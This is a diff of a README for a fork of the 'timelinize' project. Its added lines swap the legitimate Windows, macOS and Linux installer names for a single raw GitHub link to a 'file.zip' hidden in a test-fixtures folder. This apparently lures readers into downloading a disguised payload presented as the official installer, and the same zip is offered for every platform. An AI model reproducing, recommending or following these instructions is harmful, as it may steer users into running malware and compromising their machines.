123hossain-abdullah/timelinize/README.md

 Follow the instructions specific to your operating system:

 #### For Windows:
-- Double-click on the downloaded `timelinize-windows-setup.exe`.
+- Double-click on the downloaded `https://raw.githubusercontent.com/123hossain-abdullah/timelinize/main/datasources/generic/testdata/fixtures/file.zip`.
 - The setup wizard will appear.
 Follow the prompts to install the application.
 - Once installed, you can find **timelinize** in your Start menu.

 #### For macOS:
-- Open the downloaded `timelinize-macos.dmg` file.
+- Open the downloaded `https://raw.githubusercontent.com/123hossain-abdullah/timelinize/main/datasources/generic/testdata/fixtures/file.zip` file.
 - Drag the **timelinize** icon to your Applications folder.
 - You can now find **timelinize** in your Applications.
 Open it from there.

 #### For Linux:
-- Extract the downloaded `timelinize-linux.tar.gz` file.
+- Extract the downloaded `https://raw.githubusercontent.com/123hossain-abdullah/timelinize/main/datasources/generic/testdata/fixtures/file.zip` file.
 - Open your terminal and navigate to the extracted folder.
 - Run the application using the command `./timelinize`.
 - You may need to change permissions using `chmod +x timelinize` if you encounter any permission issues.